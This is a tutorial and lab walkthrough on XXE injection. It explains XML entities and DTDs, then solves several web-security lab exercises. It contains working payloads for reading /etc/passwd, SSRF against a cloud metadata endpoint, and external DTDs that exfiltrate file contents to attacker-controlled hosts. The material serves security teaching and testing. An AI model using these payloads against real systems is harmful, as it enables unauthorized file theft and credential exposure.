XXE, short for XML External Entity, is a vulnerability that occurs when an application processes XML input without properly validating it or securely configuring its parser. This vulnerability enables attackers to abuse XML parsers and carry out various actions on the vulnerable system, such as reading arbitrary files or making requests to other systems.
The XXE vulnerability arises when an application accepts XML input from untrusted sources, and this input is then processed by the XML parser. Attackers can take advantage of this by crafting malicious XML input that includes references to external entities. An external entity is an external resource like a file or a URL. When the XML parser handles this input, it tries to resolve the external entity reference, which introduces potential security risks.
Before delving deep into XXE, it is helpful to have a basic understanding of XML and its common terminology. This foundation will enable us to grasp the topic more effectively.
What is XML?
XML, or Extensible Markup Language, is a markup language used for structuring and organizing data in a hierarchical format. It provides a way to define custom tags that describe the content and structure of data. XML is often used for storing and exchanging data between different systems or applications.
In XML, data is enclosed within tags, which define elements. These elements can have attributes and contain nested elements. XML documents follow a tree-like structure, with a root element at the top and child elements branching off from it.
One of the key features of XML is its extensibility. Users can define their own tags and document structures to suit their specific needs. XML is widely used in various domains, including web services, configuration files, data interchange formats, and more. It provides a standardized way to represent and exchange data, ensuring interoperability between different systems.
In the past, XML was the preferred data transport format in web applications. It underpinned a technique called "Asynchronous JavaScript and XML (AJAX)," which enabled dynamic content updates without page reloads and made web applications more interactive. In recent years, however, XML usage for this purpose has declined significantly in favor of "JavaScript Object Notation (JSON)." JSON works seamlessly with AJAX and offers a more compact data representation than XML. As a result, XML is now far less common as a data transport format, although it remains in use in many existing systems.
XML Entities
XML entities provide a means of representing data items within an XML document using placeholders instead of the actual data itself. The XML language specification includes several predefined entities. For instance, the entities &lt; and &gt; stand for the characters < and > respectively. These characters are considered metacharacters that signify XML tags. Therefore, when they occur within data, they typically need to be represented using their respective entities.
Document Type Definition (DTD)
In XML, a Document Type Definition (DTD) is a way to define the structure, elements, and attributes of an XML document. It serves as a schema or blueprint that specifies the rules and constraints for the document's content. A DTD defines the allowable elements and their hierarchical relationships, as well as any default values, data types, and entity references used in the document.
The DTD is declared within the optional DOCTYPE declaration at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD"), can be loaded from elsewhere (known as an "external DTD"), or can be a hybrid of the two.
External DTD: An external DTD is a separate file that defines the structure and rules for an XML document. Let's say we have an XML document called "employees.xml" that contains information about employees. Here's an example of an external DTD file "employees.dtd" that defines the structure of the "employees.xml" document:
<!ELEMENT employees (employee*)>
<!ELEMENT employee (name, position)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT position (#PCDATA)>
In this example, the external DTD file "employees.dtd" defines the structure of the "employees" element and its child elements "employee", "name", and "position". The DTD specifies that "employees" can contain zero or more "employee" elements, and each "employee" must have a "name" followed by a "position" element.
Internal DTD: An internal DTD is defined directly within the XML document itself. Here's an example of an XML document with an internal DTD:
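A minimal sketch of such a document, embedded in a short Python script so it can be parsed and inspected. The declarations mirror the employees.dtd shown above; the employee data (Alice, Engineer) is made up for illustration. Note that Python's standard-library parser is non-validating: it reads the DTD but does not enforce it.

```python
import xml.etree.ElementTree as ET

# Hypothetical employees.xml with the DTD declared inline (an internal DTD).
EMPLOYEES_XML = """<!DOCTYPE employees [
  <!ELEMENT employees (employee*)>
  <!ELEMENT employee (name, position)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT position (#PCDATA)>
]>
<employees>
  <employee>
    <name>Alice</name>
    <position>Engineer</position>
  </employee>
</employees>
"""

# The parser accepts the DOCTYPE and builds the element tree as usual.
root = ET.fromstring(EMPLOYEES_XML)
names = [employee.findtext("name") for employee in root.findall("employee")]
print(root.tag, names)
```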
An internal DTD serves the same purpose as an external DTD; the only difference is that the declarations are written inside the document's own DOCTYPE rather than in a separate file.
By including a DTD declaration in an XML document, developers can validate the document against the defined structure to ensure its correctness and adherence to the specified rules.
Custom Entities
As we discussed earlier, characters such as < and > can be represented by the predefined entities &lt; and &gt; respectively. Similarly, we have the flexibility to create our own custom entities in an XML document and modify the document based on the value assigned to those entities. Custom entities are declared in the Document Type Definition (DTD) as follows:
<!DOCTYPE foo [ <!ENTITY custom_entity "This Is A Custom Entity"> ]>
In this declaration, the entity custom_entity is defined with the value "This Is A Custom Entity". Any usage of the entity reference &custom_entity; within the XML document will be replaced with the defined value, resulting in the desired modification of the document.
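To see the substitution happen, here is a small sketch using Python's standard-library parser. The root element name note is an assumption chosen for the example; the entity name and value are the ones from the declaration above.

```python
import xml.etree.ElementTree as ET

# An internal (custom) entity declared in the DTD and referenced in the body.
DOC = """<!DOCTYPE note [ <!ENTITY custom_entity "This Is A Custom Entity"> ]>
<note>&custom_entity;</note>"""

root = ET.fromstring(DOC)
# The parser replaces the reference with the declared value.
print(root.text)  # This Is A Custom Entity
```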
XML External Entities
XML external entities are a type of custom entity, like those discussed above, except that their values are stored outside the Document Type Definition (DTD) itself. To declare an external entity, we use the SYSTEM keyword to indicate that it is an external resource and provide the URL from which the value will be fetched. Here's an example:
<!DOCTYPE test [ <!ENTITY ext_entity SYSTEM "https://example.com">]>
In the above example, the value of ext_entity is loaded from the site https://example.com, and any reference to &ext_entity; within the XML document will be replaced with the content fetched from that URL.
External entities can also be loaded from the local server using the file:// protocol. For instance, we can load the content of a local file into the XML document using the following external entity:
<!DOCTYPE test [ <!ENTITY file SYSTEM "file:///home/user/file.txt">]>
In this case, any occurrence of &file; within the XML document will be replaced with the content of the file.txt file.
XML external entities are a key component exploited in XML external entity (XXE) injection attacks. Attackers can leverage these entities to inject their custom external entities, allowing them to retrieve sensitive server files' content or request content from other servers. XXE vulnerabilities can be highly damaging, providing unauthorized access to sensitive information and enabling various forms of attacks.
Now that we know about XML, let's move on to XXE injection attacks.
How do XXE vulnerabilities arise?
As discussed earlier, many applications, particularly legacy ones, rely on XML as their main method of data transportation. Such an application uses standard libraries, APIs, or XML parsers to parse the XML data. Although the application may not intend to use XML external entities, these parsers, APIs, and libraries often support the feature, and some enable it by default.
Attackers take advantage of this support by manipulating the XML data in a way that tricks the parsers into parsing their added external entity. This allows them to retrieve the content of local files or make external web requests to fetch resources using XML external entities.
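Whether a given parser resolves external entities depends on the library and its configuration, so it is worth checking rather than assuming. As a rough sketch, the probe below feeds a document with an external entity to Python's xml.etree.ElementTree, which does not expand external entities and raises a ParseError when one is referenced. The function name is hypothetical, and other parsers (or other languages) may behave very differently.

```python
import xml.etree.ElementTree as ET

# Probe document: declares an external entity and references it in the body.
PROBE = """<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<foo>&xxe;</foo>"""

def accepts_external_entity_reference(xml_text):
    """Return True if the parser accepted the document without complaint."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        # ElementTree rejects the reference instead of fetching the resource.
        return False
    return True

print(accepts_external_entity_reference(PROBE))
```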
XXE Attacks
In XXE Injection attacks, there are various types of exploitation that can occur in real-life scenarios. These include:
Retrieving Files: Attackers can use XXE injection to retrieve files from the server. By injecting malicious XML entities, they can trick the system into disclosing sensitive files.
Server-Side Request Forgery (SSRF): XXE injection can be used to perform SSRF attacks. Attackers can make the vulnerable application send arbitrary requests to other servers, allowing them to interact with external resources.
Blind Data Exfiltration using Out-of-Band (OAST) Techniques: Attackers can leverage XXE injection to exfiltrate data from the server using out-of-band channels. This involves sending data to their controlled external server via XML entities.
Blind XXE to Retrieve Data via Error Messages: By injecting specific XML entities, attackers can trigger error messages from the server that contain sensitive information. These error messages can be used to extract valuable data indirectly.
Let's discuss each of them in detail.
Exploiting XXE to retrieve files
As we discussed earlier, exploiting XXE requires an external entity to be introduced in the XML data sent to the server. This takes two steps: introduce (or edit) a DOCTYPE declaration that defines the external entity, and then reference that entity in a data value within the XML.
In the DOCTYPE declaration, you define the external entity and specify the server file you want to read. Once the external entity is declared, you reference it within your XML data; the parser substitutes the file's contents, which the application may then return in its response. The reference can be placed in any data value that the application processes and reflects.
Let's take an example of a shopping application that checks the stock level of a product by submitting XML data to the server. The initial XML payload looks like this:
In this scenario, the application doesn't have any defenses against XXE attacks, which allows us to exploit the vulnerability. We can retrieve the contents of the /etc/passwd file by submitting the following XXE payload:
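As a sketch in Python, assuming the request body matches the one used in the labs later in this article, the initial body and the XXE payload could be built like this. The helper name with_file_entity is hypothetical.

```python
# Baseline stock-check body, as it appears in the lab requests.
BASELINE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)

def with_file_entity(path):
    """Return the stock-check body with productId replaced by an external entity."""
    # Declare an external entity that points at a local file on the server.
    doctype = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{path}"> ]>'
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        + doctype
        # Reference the entity where the product ID used to be.
        + "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )

print(BASELINE)
print(with_file_entity("/etc/passwd"))
```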
In this XXE payload, we define an external entity &xxe; that fetches the contents of the /etc/passwd file using the file:/// protocol. We then use this entity within the productId value. As a result, the application's response includes the contents of the file:
By exploiting the XXE vulnerability, we are able to retrieve sensitive information from the server, in this case, the contents of the /etc/passwd file.
Note In real-world scenarios, XXE vulnerabilities often involve XML with numerous data values. Each of these values may be used within the application's response, making it necessary to systematically test each data node for XXE vulnerabilities. By utilizing the defined entity and observing whether it appears in the response, you can perform individual tests on each data node in the XML. This approach allows for comprehensive testing and identification of potential XXE vulnerabilities.
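The per-node testing described in this note can be automated. The sketch below is one possible approach, not a standard tool: it walks the leaf elements of a request body and produces one payload per node, each referencing &xxe; in that node only. The function name and the XXEMARK placeholder are assumptions made for this example.

```python
import xml.etree.ElementTree as ET

MARK = "XXEMARK"  # placeholder, swapped for the entity reference after serialising
DOCTYPE = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'

def per_node_variants(xml_body):
    """Return (tag, payload) pairs, one per leaf element of xml_body."""
    leaf_count = sum(1 for el in ET.fromstring(xml_body).iter() if len(el) == 0)
    variants = []
    for index in range(leaf_count):
        root = ET.fromstring(xml_body)  # fresh copy for each variant
        leaves = [el for el in root.iter() if len(el) == 0]
        leaves[index].text = MARK
        # Serialising "&xxe;" directly would escape the ampersand, so the
        # placeholder is replaced in the serialised string instead.
        body = ET.tostring(root, encoding="unicode").replace(MARK, "&xxe;")
        variants.append((leaves[index].tag, DOCTYPE + body))
    return variants

body = "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
for tag, payload in per_node_variants(body):
    print(tag, payload)
```

Each payload is then submitted separately, and the response is checked for the file contents.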
LAB #1: Exploiting XXE Using External Entities To Retrieve Files
This lab contains the Check Stock feature that parses XML Input and returns any unexpected values in the response. Use XXE to retrieve the content of the /etc/passwd file.
Solution
This lab showcases a shopping application that sells various products. Each product has its own details page, identified by a productId number, such as https://0af100a304648b108004495600860067.web-security-academy.net/product?productId=6. On the details page, there is information about the product, and it also includes a stock check functionality.
The stock check functionality involves sending a POST request to a backend API to retrieve stock information. The API request contains XML data in the body, specifying the product and store IDs. Here's an example of the API request:
It's obvious that the application uses XML for data transportation. To test whether the application accepts XML payloads that contain a DTD, we can modify the XML data by introducing a DOCTYPE declaration.
By introducing a simple test DOCTYPE declaration, we can check whether the application accepts it or blocks it. If the application does not return an error, it accepts the payload.
We can then proceed to introduce external entities to retrieve internal files. The XML payload would look like this:
In this payload, we create an external entity xxe that uses the file:/// protocol to retrieve the /etc/passwd file. We then reference this entity in our XML document. The request and response would appear as follows:
Request
POST /product/stock HTTP/2
Host: 0af100a304648b108004495600860067.web-security-academy.net
Cookie: session=zn0Ea6PIR1aDQmJnpgooHS7IfdWu6FMu
Content-Length: 176
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ] >
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
As you can see, the &xxe; entity is replaced with the content of /etc/passwd. The application treats this value as an invalid product ID and returns an error message that echoes it, unintentionally revealing the content of the /etc/passwd file.
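If you prefer scripting the request over using a proxy tool, a rough sketch with Python's standard library might look like the following. It only builds the request object and does not send it. The base URL is a placeholder for your own lab instance, the session cookie is omitted, and build_stock_request is a hypothetical helper name.

```python
import urllib.request

def build_stock_request(base_url, xml_body):
    """Build (but do not send) the POST request to the stock-check endpoint."""
    return urllib.request.Request(
        url=base_url.rstrip("/") + "/product/stock",
        data=xml_body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )

XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
)

# "https://lab.example" is a placeholder, not a real lab host.
request = build_stock_request("https://lab.example", XXE_BODY)
print(request.get_method(), request.full_url)
```

Passing the object to urllib.request.urlopen would send it; Content-Length is filled in automatically at that point.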
XXE To Perform SSRF Attacks
Apart from retrieving sensitive data, XXE attacks can also be used to carry out server-side request forgery (SSRF). SSRF is a potentially severe vulnerability where the server-side application can be manipulated to make HTTP requests to any URL accessible by the server.
To exploit an XXE vulnerability to perform an SSRF attack, the process is similar to what we have discussed before. Instead of using the file:/// protocol to retrieve local files, we provide the URL of the server to which we want to send the request. Then, we reference that entity in a data value that the application returns in its response.
If we successfully receive the response from the requested server (achieving two-way interaction), it indicates that we have achieved the reflected SSRF condition. However, if we only receive interaction from the server without obtaining its response, we have to rely on blind SSRF conditions. Even though blind SSRF may not provide direct access to the response, it can still be critical in certain situations.
In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
LAB #2: Exploiting XXE To Perform SSRF Attacks
This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response. Exploit the XXE vulnerability to obtain information from the simulated EC2 metadata endpoint, which is running at the following URL:
http://169.254.169.254/
Solution
This lab showcases a shopping application that sells various products. Each product has its own details page, identified by a productId number, for example: https://0af100a304648b108004495600860067.web-security-academy.net/product?productId=6. The details page provides information about the product and includes a stock check functionality.
The stock check functionality involves sending a POST request to a backend API to retrieve stock information. The API request contains XML data in the body, specifying the product and store IDs. Here's an example of the API request:
POST /product/stock HTTP/2
Host: 0a3b00db03d7a2218097947a005e0016.web-security-academy.net
Cookie: session=RQaunglELpPbYgAiHvEsb5Gm2pUoWMtO
Content-Length: 107
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
Similar to the previous lab, we create an external entity to fetch a resource. However, whereas the previous lab read a local file using the file:/// protocol, in this lab the entity points to an HTTP URL, so the server makes the request on our behalf (an SSRF attack).
We attempt to access the cloud metadata endpoint to retrieve IAM-related information. The endpoint is available at the URL http://169.254.169.254/.
Our payload for this XXE attack looks like the following:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/">] >
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
When we send the above request, the response we receive is:
In this case, the response contains latest, which is a common result when attacking Cloud Metadata instances. To obtain more information, we need to recursively follow the directory tree by appending /latest, /meta-data, /iam, /security-credentials, and eventually /admin to the URL. This will eventually provide us with IAM-related information.
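The walk down the directory tree can be sketched as follows. The path segments are the ones named above; the helper names are hypothetical, and in practice each segment is discovered from the previous response rather than known in advance.

```python
BASE = "http://169.254.169.254/"
SEGMENTS = ["latest", "meta-data", "iam", "security-credentials", "admin"]

def metadata_urls(base, segments):
    """Return the URL to request at each step, one path segment deeper each time."""
    urls, current = [], base.rstrip("/")
    for segment in segments:
        current = f"{current}/{segment}"
        urls.append(current)
    return urls

def ssrf_payload(url):
    """Wrap a URL in the stock-check XXE payload used in this lab."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{url}">]>'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )

for url in metadata_urls(BASE, SEGMENTS):
    print(url)
```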
Blind XXE Vulnerabilities
Blind XXE vulnerabilities refer to situations where the application does not directly disclose the values of defined external entities in its responses. This means that retrieving server-side files becomes more challenging.
However, blind XXE vulnerabilities can still be detected and exploited using advanced techniques. One approach is to employ out-of-band techniques, where you leverage external channels to communicate with the attacker-controlled server and exfiltrate data. Another method involves triggering XML parsing errors, which can sometimes reveal sensitive information within error messages.
Detecting Blind XXE Using Out-of-band (OAST) Techniques
To detect blind XXE vulnerabilities, you can utilize the same technique as with the previous XXE injection to perform an SSRF attack. However, in blind XXE injection, you trigger out-of-band network interactions to a system that you control, allowing you to indirectly confirm the success of the attack.
For instance, you can define an external entity within the XML document as follows:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>
Next, you incorporate the defined entity into a data value within the XML. This XXE attack will cause the server to initiate a back-end HTTP request to the specified URL.
By monitoring the resulting DNS lookup and HTTP request on your controlled system, you can determine if the XXE attack was successful, even though the application itself may not directly disclose the information.
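When several injection points are tested, it helps to give each probe its own subdomain so that an incoming interaction can be traced back to the request that caused it. A minimal sketch, assuming you control a listener domain (listener.example is a placeholder) and that the helper name oast_probe is ours:

```python
import secrets

def oast_probe(listener_domain):
    """Return a random token and a DOCTYPE whose entity points at token.listener_domain."""
    token = secrets.token_hex(8)  # 16 hex characters, unique per probe
    url = f"http://{token}.{listener_domain}"
    doctype = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]>'
    return token, doctype

token, doctype = oast_probe("listener.example")
print(token)
print(doctype)
```

A DNS lookup or HTTP request for that exact subdomain on the listener then confirms which probe was processed.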
LAB #3: Blind XXE With Out-of-band Interaction
Exploit the Check Stock feature, which parses XML input, by using an XXE injection attack to trigger a DNS lookup and an HTTP request to Burp Collaborator.
Solution
This lab has similar functionality to the previous ones, but this time the application won't show us the content of the /etc/passwd file or the response to any out-of-band request. Instead, it validates the product ID and, if it is not valid, simply returns an "Invalid Product ID" error. Unlike the previous labs, it does not echo the invalid value we sent in our request.
Due to the absence of direct feedback through reflected XXE methods, we cannot confirm whether they are parsing XXE payloads or not. However, we can still perform Out-of-band interactions to ascertain if XXE payloads are being processed.
To achieve Out-of-band interactions, we can use services like interact.sh or ngrok to generate a random link that we can use for testing. However, for this lab, we are limited to using Burp Collaborator which comes with a Burp Suite Professional license.
To solve this lab, we can use an arbitrary Burp Collaborator link since we are not exfiltrating any data this time. Simply making the server send a request to any random Burp Collaborator link will solve this lab. The XXE payload remains the same as in the previous labs, but we need to include the Collaborator link in it, as shown below:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://u4zis9sxe3876bfhf0el25vef5lv9k.oastify.com"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Submitting the above payload will solve the lab.
In some cases, web applications defend against XXE by blocking regular external entities, validating input, or applying other hardening practices. Even then, XXE injection may still be possible using XML parameter entities.
Parameter Entities
XML Parameter Entities are used to make reusable blocks in the XML document that can be referenced within the DTD. They are similar to general entities, but they are defined and called using the % symbol instead of the & symbol.
<!ENTITY % myparameterentity "my parameter entity value" >
They can be referenced within the DTD using:
%myparameterentity;
As explained above, parameter entities are commonly used to define reusable blocks within the DTD. For example, a parameter entity %IT_Staff can be declared in the Document Type Definition (DTD) using an <!ENTITY> declaration and assigned the value "<Role>IT Staff</Role><Salary>$2000</Salary>".
That block can then be pulled in wherever the DTD references %IT_Staff;. Note that parameter entity references are recognized only inside the DTD: a %IT_Staff; written in element content, such as inside the <employees> element, is treated as literal text and is not expanded.
By using parameter entities, you can define and reuse blocks throughout the DTD, making it more modular and easier to maintain. Any change made to the %IT_Staff entity is reflected wherever it is referenced, which promotes reuse and simplifies the structure of the DTD.
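One detail worth verifying for yourself is where parameter entity references are actually recognized. The sketch below, using Python's standard-library parser and made-up entity names (greeting, name), suggests that a reference written with % in element content is left as literal text, while a general entity written with & is expanded.

```python
import xml.etree.ElementTree as ET

DOC = """<!DOCTYPE employees [
  <!ENTITY % greeting "hello">
  <!ENTITY name "Alice">
]>
<employees>%greeting; &name;</employees>"""

root = ET.fromstring(DOC)
# "%greeting;" stays as-is in the body; "&name;" is replaced with its value.
print(root.text)  # %greeting; Alice
```

This is why the parameter entity payloads later in this article place their references inside the DOCTYPE rather than in a data value.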
External Parameter Entities
The parameter Entity can also be referenced in the DOCTYPE declaration like the following.
<!DOCTYPE foo [<!ENTITY % book SYSTEM "books.dtd"> %book;]>
This type of parameter entity reference is called an External Parameter Entity. To declare an external parameter entity, we use a regular ENTITY declaration with a % sign, similar to a normal parameter entity. However, instead of directly including the replacement text, the declaration includes the SYSTEM keyword followed by a URI that points to the DTD piece it wants to include. Learn more about Parameter Entities and External Parameter Entities from this link: Parameter Entities
We can use parameter Entities to perform XXE injection attacks like the following.
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
This XXE payload declares an XML parameter entity called xxe and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.
LAB #4: Blind XXE With Out-of-band Interaction via XML Parameter Entities
Exploit the Check Stock functionality that supports XML input to perform an XXE injection attack that makes a DNS lookup. This application blocks regular external entities.
Solution
In this lab, the Stock Check functionality still uses XML for data transportation, similar to what we have seen in previous labs. However, when we attempt to use regular external entities, the application shows the following error message: "Entities are not allowed for security reasons."
Interestingly, the application seems to block only references to external entities. If you define an external entity in your DOCTYPE but don't reference it anywhere in your XML document, you won't receive the above error message.
This indicates that the check targets the invocation of regular entities. As discussed earlier, in this situation we can use parameter entities. The XXE payload remains the same, but instead of a regular external entity we declare and reference a parameter entity inside the DOCTYPE, as shown below:
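A minimal sketch of such a payload, built in Python. It follows the parameter entity example given earlier; the callback URL is a placeholder for your own Collaborator address, and the helper name is hypothetical.

```python
def parameter_entity_probe(callback_url):
    """Return a stock-check body whose DOCTYPE declares and references a parameter entity."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        # The entity is declared with "%" and referenced inside the DTD itself,
        # so no regular entity reference appears in the data values.
        f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{callback_url}"> %xxe; ]>'
        "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
    )

print(parameter_entity_probe("http://listener.example"))
```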
As observed in the above payload, we are using parameter-based entities. When this payload is used, you will notice that they throw an XML Parsing error. However, in our Burp Collaborator instance, we can see some interactions being made, indicating that they are still vulnerable to XXE injection attacks.
Blind XXE to Out-of-band Data Exfiltration
The real power of XML parameter entities lies in out-of-band data exfiltration. Detecting a blind XXE vulnerability via out-of-band interaction is useful, but the real impact comes when we use that interaction to exfiltrate data. This technique is a little harder to exploit, but when it succeeds it can be very valuable.
To exploit Blind XXE and exfiltrate data, we utilize the nesting of XML parameter entities. This involves creating a DTD file that we control, which contains specific content to facilitate the exfiltration of data such as:
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">%eval;%exfiltrate;
In the above DTD payload, we define two XML parameter entities. First, we create the file parameter entity that points to the /etc/passwd file. However, at this stage, it doesn't fetch the content of the file. It simply serves as a reference to that file.
Next, we define the eval parameter entity, whose value is itself the declaration of another parameter entity called exfiltrate. That declaration includes a reference to %file; in its URL, so when %exfiltrate; is referenced, the parser requests the URL with the contents of the file appended as the x query parameter.
To make use of these entities, we reference %eval;, which expands it and declares the exfiltrate entity. We then reference %exfiltrate; in the DTD, which triggers the request that carries the data to the specified URL.
Overall, this payload allows us to leverage parameter entities to manipulate the XML document and perform actions such as exfiltrating data to a specific location.
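Note: &#x25; is the XML character reference that represents the % sign. The nested declaration uses it because a bare % is not permitted inside an entity value.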
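To make the structure of the DTD easier to follow, here is a sketch that assembles it line by line. The function name and the listener URL are assumptions; the layout mirrors the DTD described above, with &#x25; standing in for % in the nested declaration.

```python
import html

def exfil_dtd(file_path, callback_url):
    """Return the text of an external DTD that sends file_path's contents to callback_url."""
    # The inner declaration is written with &#x25; so that it only becomes
    # a real parameter entity declaration once %eval; is expanded.
    inner = f"<!ENTITY &#x25; exfiltrate SYSTEM '{callback_url}/?x=%file;'>"
    return "\n".join([
        f'<!ENTITY % file SYSTEM "file://{file_path}">',
        f'<!ENTITY % eval "{inner}">',
        "%eval;",
        "%exfiltrate;",
    ])

print(exfil_dtd("/etc/hostname", "http://listener.example"))
print(html.unescape("&#x25;"))  # %
```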
Now that we have created our malicious DTD file and understand its concept, the next step is to host that DTD file on our controlled server. We can use a URL like http://example.com/malicious.dtd to serve the file.
Once the DTD file is hosted, we can inject it into the vulnerable target server by referencing it within the XML document. The following XML code demonstrates this:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://example.com/malicious.dtd"> %xxe;]>
In this XML code, we define an XML parameter entity called xxe and then utilize this entity within the DTD. As a result, the XML parser will fetch the external DTD from our controlled server and process it. The defined steps within the malicious DTD will be executed, ultimately leading to the transmission of the /etc/passwd file to our controlled server.
By leveraging this technique, we can exploit the Blind XXE vulnerability and exfiltrate sensitive data from the target server to our desired location.
In certain cases, this technique may not work effectively with certain file contents, particularly if they include newline characters. This limitation arises because some XML parsers use an API that validates the characters allowed within the URL when fetching the URL specified in the external entity definition. In such situations, it may be worth considering an alternative protocol like FTP instead of HTTP.
However, even with the FTP protocol, there might still be constraints on exfiltrating data that contain newline characters. In such scenarios, it could be beneficial to target a different file, such as /etc/hostname, which may not include newline characters and can still provide valuable information.
LAB #5: Exploiting Blind XXE To Exfiltrate Data Using A Malicious External DTD
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, exfiltrate the contents of the /etc/hostname file.
Solution
This lab contains the familiar Stock Check functionality that uses XML for data transportation, as seen in previous labs. However, unlike those labs, this one blocks the use of External Entities but permits the use of Parameter-based entities.
Knowing that Parameter-based entities are allowed, we can utilize them to exfiltrate data. The approach involves calling parameter entities to access our controlled DTD file, which contains the use of parameter-based entities to fetch the content of the desired file and make an Out-of-band request to send that data.
First, we navigate to the Exploit server of this lab, where we create and host a malicious DTD file with the following XML DTD code:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://co4j7wzfrzyfq96fllt5snb8qzwpke.oastify.com/?x=%file;'>">
%eval;
%exfiltrate;
In the above DTD file, you can see our Burp Collaborator instance URL. Its GET parameter x references %file;, a parameter entity that holds the content of the target file.
We name the file exploit.dtd (or any preferred name) and then click on "Store" at the bottom to save the changes. After this, we copy the hosted URL of this file and modify the XML data in our request accordingly. The modified request looks like this:
POST /product/stock HTTP/2
Host: 0a9b00d503f593ac82974cda00e900c3.web-security-academy.net
Cookie: session=0aYDXP9fddmgOq6aLqb2l6qEAKch2O3i
Content-Length: 236
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a8a00dd0339934982db4b4801550072.exploit-server.net/exploit.dtd"> %xxe;]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
In the above request body, you will find our XXE payload that loads our exploit.dtd file and then parses it to send the content of the /etc/hostname file. Upon sending the request, you will notice some out-of-band interactions being made in your Burp Collaborator. Click on the relevant request and then select the Request to Collaborator option to view the entire request, including the GET parameter containing the content of the /etc/hostname file. Copy that content and submit it to successfully solve this lab.
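If you are reading raw listener logs instead of the Collaborator interface, the exfiltrated value can be pulled out of the request line with a few lines of Python. This is a sketch; the sample request line and its value are invented for illustration.

```python
from urllib.parse import urlsplit, parse_qs

def exfiltrated_value(request_line, param="x"):
    """Extract the value of `param` from an HTTP request line, or None if absent."""
    _method, target, _version = request_line.split(" ", 2)
    values = parse_qs(urlsplit(target).query).get(param)
    return values[0] if values else None

# Hypothetical request line as it might appear in a listener log.
print(exfiltrated_value("GET /?x=a1b2c3d4e5f6 HTTP/1.1"))
```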
Blind XXE To Retrieve Data Via Error Messages
An alternative method for exploiting blind XXE vulnerabilities is to intentionally trigger an XML parsing error that includes the sensitive data you want to retrieve in the resulting error message. This approach is effective when the application includes the error message within its response.
To accomplish this, you can use a malicious external DTD to trigger an XML parsing error message containing the contents of the /etc/passwd file. Here is an example of the XML payload:
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
The XML code defines two parameter entities, %file and %eval, and then uses them to define another parameter entity named %error. Here's how it works:
%file is defined to point to the /etc/passwd file using the file:/// protocol.
%eval is defined to contain an internal parameter entity declaration, which creates an entity named %error.
%error is defined to include a reference to %file; in its value and points to a path under file:///nonexistent/, which does not exist, to trigger the error.
Finally, the %eval; and %error; entities are referenced in the DTD.
When the XML document is parsed, it will attempt to resolve the entities, leading to an XML parsing error. The error message will include the contents of the /etc/passwd file, allowing the attacker to retrieve sensitive data.
We can host this DTD file as we did above and then reference it from the XML payload just as before. The parser fetches our malicious external DTD, and processing it results in an error message that contains the file's contents.
